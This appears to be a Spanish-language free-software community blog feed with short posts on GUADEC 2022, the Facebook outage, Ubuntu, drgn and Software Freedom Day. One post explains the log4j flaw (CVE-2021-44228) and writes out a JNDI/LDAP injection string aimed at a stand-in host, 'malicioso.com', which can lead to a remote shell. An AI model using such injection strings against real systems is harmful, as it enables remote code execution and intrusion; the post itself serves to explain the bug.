En unas horas comenzará la GUADEC en Guadalajara, México. Ojalá puedan darse una vuelta :)

https://events.gnome.org/event/77/

Se ha anunciado [1]: La Conferencia (Europea) de Usuarios y Desarrolladores de
GNOME, GUADEC, se realizará del 20 al 25 de Julio, en Guadalajara, Jalisco,
México. Marquen sus agendas y preparen el viaje.

Es la primer GUADEC después del parón de dos años por la pandemia.

Es la GUADEC que enmarca el 25 aniversario del proyecto GNOME, lanzado por los
connacionales Miguel de Icaza y Federico Mena.

Es la primer GUADEC que se realiza fuera del territorio europeo.

La del 2020 se había planeado para que fuera en Zacatecas, pero por el COVID19
se tuvo que cancelar. Ojalá que en esta ocasión todo salga sin mayores
inconvenientes.

1. https://events.gnome.org/event/77/

Para estas alturas posiblemente todos ya estarán enterados del fallo de seguridad en log4j[1], aunque creo que vale la pena repasarlo.

Todo software más o menos complejo registra los eventos que le conciernen. La forma más simple de registrar estos eventos, sería imprimir en la salida estándar o de error un mensaje, humanamente legible, describiendo el evento en cuestión. Pero el registro de eventos puede complicarse al grado de que existen bibliotecas de software específicas que abstraen esta actividad. Hay bibliotecas de "logging" (como se conoce al registro de eventos) para todos los lenguajes, y log4j[2] es uno de los disponibles para Java.

¿En qué consiste el bug?

En pocas palabras, log4j "parsea" los mensajes a registrar en búsqueda de variables que puede reemplazar. Por ejemplo, el programador loggea este mensaje:

logger.info("El usuario " + user + " ha entrado").

Entonces log4j parsea la cadena y sabe que la variable user, en el estado actual de la aplicación es "ceyusa", por lo que finalmente escribe en bitácora

12:38:10.234 [main] INFO Main - El usuario 'ceyusa' ha entrado

Esto es muy útil, pero como todos los datos proveeidos por el usuario, son potencialmente peligrosos, máxime si éstos viajan por red.

Supongamos que el usuario puede cambiar su nombre de usuario de "ceyusa" a "${java:version}". log4j parseará esa cadena y verá que es un programa en java que ejectua, por lo que el resultado será:

12:38:10.234 [main] INFO Main - El usuario 'Java version 1.8.0_213' ha entrado

Por otro lado, hay una cosa en Java que se llama JNDI: Java Naming and Directory Interface[3]. Es una interfaz para indicar, a la máquina virtual de Java, la localización de un recurso remoto, por ejemplo una base de datos, un Enterprise Java Bean, etcétera. Uno de los usos más comunes es obtener información de un directorio a través del protocol LDAP.

En nuestro ejemplo, el usuario podría cambiar su nombre de usuario por '${jndi:ldap://malicioso.com:1389/123}'. Lo que haría log4j sería parsear esa cadena y ejectuarla. Al usar la API de JNDI, sabrá que el contenido de esa variable se encuentra en un servidor remoto, llamado malicioso.com, usando el protocolo LDAP y obtendrá el registro con la llave 123. Este servidor remoto puede estar bajo control del atacante y devolverá una cadena que se ejecutará dentro de la máquina virtual de Java que ejecuta de nuestra inocente aplicación, como, por ejemplo, lanzar una terminal en un puerto TCP (el típico remote backdoor).

¿Por qué es tan reelevante?

1. Hay un montón de software en Java, legacy, sin mantener, ejecutándose en internet, usando una versión vulnerable de log4j.
2. Hay un montón de software en Java, mantenido, pero que tiene una dependencia fuerte a un framework que usa una versión vulnerable de log4j.
3. Hay demasiado software en Java, como en bancos, controladores aeropuertuarios, etc.

Finalmente, nos remite al cartón de XKCD[4] sobre tener dependencias profundas de software, en sistemas complejos. O, al otro, clásico, sobre no confiar, nunca, en lo absoluto, en las entradas del sistema[5].

Es más, hay quien toma esta situación como argumento para evitar esos grantes frameworks totalizantes, y que sólo el lenguaje de programación sea nuestro framework[6].

1. https://nvd.nist.gov/vuln/detail/CVE-2021-44228
2. https://logging.apache.org/log4j/2.x/
3. https://docs.oracle.com/javase/tutori...index.html
4. https://xkcd.com/2347/
5. https://xkcd.com/327/
6. https://twitter.com/tomaka17/status/1...7790571522

Sin ímpetus de coherencia la susodicha red social no es santo de mi devoción, mucho menos su dueño y su accionistas, mas debo decir que sus desarrolladores hacen cosas muy interesantes que luego tienen la amabilidad de publicar como software libre [1], como su transpilador a PHP[2].

Pues ahora presentan su debugger, otro reemplazo a gdb, pero ahora usando Python como interfaz con el usuario, llamado drgn[3]. Me parece interesante, aunque yo soy más de debug a punta de printf.

1. https://github.com/facebook
2. https://hacklang.org/
3. https://developers.facebook.com/blog/...nel-scale/

Acaba de publicarse El Almanaque de la Web, 2021.

El Almanaque de la Web es un esfuerzo por sintetizar *el estado de la web*, un compendio de cuáles y cómo se usan las diferentes tecnologías que componen la World Wide Web, a decir, HTML, JavaScript, CSS, WebAssembly, y un largo etcétera.

https://almanac.httparchive.org/en/20...f-contents

En este momento Facebook, WhatsApp e Instagram llevan varias horas caídos.

Justo cuando un whistleblower había salido en los medios de EEUU alertando sobre las malas prácticas de Facebook, las tablas de ruteo (BGP) para acceder a los servidores de Facebook fueron actualizadas... hacia ninguna parte.

Pero para hacer el problema más gordo, los mismo empleados de Facebook no pueden utilizar su software interno porque todo usa el dominio facebook.com, que es inaccesible.

Para más información: https://krebsonsecurity.com/2021/10/w...-whatsapp/

Así que ahora a explorar otros servicios, otras actividades, otras formas de comunicarse.

Saludos a todos,

A sabiendas de que esto puede estar un tanto polémico por lo que es linux, el software libre y sus comunidades, la Secretaria de Comunicaciones y Transportes en cooperación con otras instituciones, abren la posibilidad de realizar el examen de certificación para administrador de sistemas (EXT200) de la empresa RedHat.

Aqui el URL: http://retoredhat.com/

Ante la incorporación del sistema de búsquedas personalizadas de Amazon en la última versión de Ubuntu, Richard Stallman hace llamado a no usar, distribuir o recomendar Ubuntu.
Nota: http://www.fsf.org/blogs/rms/ubuntu-spyware-what-to-do

El evento Software Freedom Day 2011 que celebramos el pasado 17 de Septiembre en la ciudad de Guanajuato tuvo éxito, desde luego siempre aparecen los detalles de ultima hora pero finalmente son gajes del oficio.

Nuestra aventura empezó solo como una propuesta para juntarnos algunos cuantos como ramel, pedro, magally y un servidor y la idea básicamente era asistir a un pequeño restaurante o café y platicar un poco sobre nuestro diario acontecer e intercambiar experiencias sobre el software libre en general, sin embargo no conforme con ello decidimos que seria bueno realizar un evento no muy grande para celebrar en forma el día del software libre.

Tuvimos bastante audiencia y mucho interés por parte de todos, podemos medirlo como un éxito , me sorprendió ver algunos compañeros del Cinvestav que por su propia voluntad asistieron.

Las fotos, presentaciones y toda la información extraordinaria en el sitio de red oficial http://sfdgto.wordpress.com, http://wiki.softwarefreedomday.org/2011/Mexico/Guanajuato/Comunidad-de-Software-Libre-Guanajuato

Gracias a Magally, Pedro , Ramón, Aldo, Juan Jose, Ceyusa, Chepix ..bueno a todos todos los demás por una vez más lograr el objetivo y si contamos con salud nos vemos el próximo año.

Dell desde hace un rato tiene la opción de poder cambiar el sistema operativo en algunos de los equipos que vende del omnipresente MS-Windows a Ubuntu. Si bien la diferencia en el precio no se nota (e incluso a veces es ridícula), Dell ha procurado estar dando información sobre Linux y en particular la distro que usa: Ubuntu.

En el su sección de "Open Source" dan 10 puntos por los cuales elegir Ubuntu sobre Windows:
cont.